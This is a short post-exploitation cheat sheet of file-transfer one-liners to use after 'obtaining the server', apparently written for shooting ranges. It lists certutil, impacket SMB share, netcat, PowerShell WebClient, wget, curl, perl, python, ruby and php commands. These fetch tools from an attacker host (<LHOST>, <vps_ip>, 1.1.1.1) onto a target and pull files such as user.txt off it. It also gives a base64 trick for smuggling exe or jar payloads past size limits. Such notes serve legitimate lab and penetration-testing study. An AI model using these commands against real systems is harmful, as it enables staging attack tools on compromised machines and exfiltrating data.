After obtaining the server, you need to upload tools or download files from the server. Different scenarios (network environments) may require different file download tools, which can also be used in shooting ranges. Here is a simple record.
- windows
certutil -urlcache -split -f "http://<LHOST>/<FILE>" <FILE>
- impacket
Use the impacket-smbserver
tool to create an SMB server.
sudo impacket-smbserver <SHARE> ./
Default SMB1 protocol error
sudo impacket-smbserver <SHARE> . -smb2support
The -smb2support
option enables SMB2 protocol support, which means that clients using the SMB2 protocol can connect to the share.
SMB2 blocks access due to security policies
Password needs to be set
sudo impacket-smbserver SHARE ./ -smb2support -username lca -password abc+123
- python
python -m http.server <port>
- nc
On the VPS
cat user.txt | nc -l 1234
nc -l 1234 < user.txt
On the target machine:
nc <vps_ip> 1234 > user.txt
Note: After the connection is established, it has been tested that the target machine can only receive the data completely after pressing ctrl+c on the VPS, otherwise it will keep getting stuck.
- powershell
$p = New-Object System.Net.WebClient;$p.DownloadFile("http://1.1.1.1:8000/user.txt","C:\Users\lca\Desktop\user.txt");
- wget
wget http://1.1.1.1/user.txt -O C:\Users\lca\Desktop\user.txt
- curl
curl http://1.1.1.1:8000/user.txt -o C:\Users\lca\Desktop\user.txt
- perl
perl -e "use LWP::Simple; getstore('http://1.1.1.1/user.txt', '/tmp/user.txt');"
- python
python -c "import urllib.request;urllib.request.urlretrieve('http://1.1.1.1/user.txt', '/tmp/user.txt')"
- ruby
ruby -ropen-uri -e "open('/tmp/user3.txt', 'wb') { |file| file << URI.open('http://1.1.1.1:8000/user.txt').read }"
- php
php -r "file_put_contents('/tmp/user4.txt', file_get_contents('http://1.1.1.1:8000/user.txt'));"
Note: Sometimes, if you want to download files of type exe or jar, you can convert them to base64 format first, and then restore the base64-encoded content after transmission. If there is a size limit, you can also transmit in blocks.
# Encoding
base64 -i xxx.jar > out.txt
# Restoration
base64 --decode -i out.txt -o 1.jar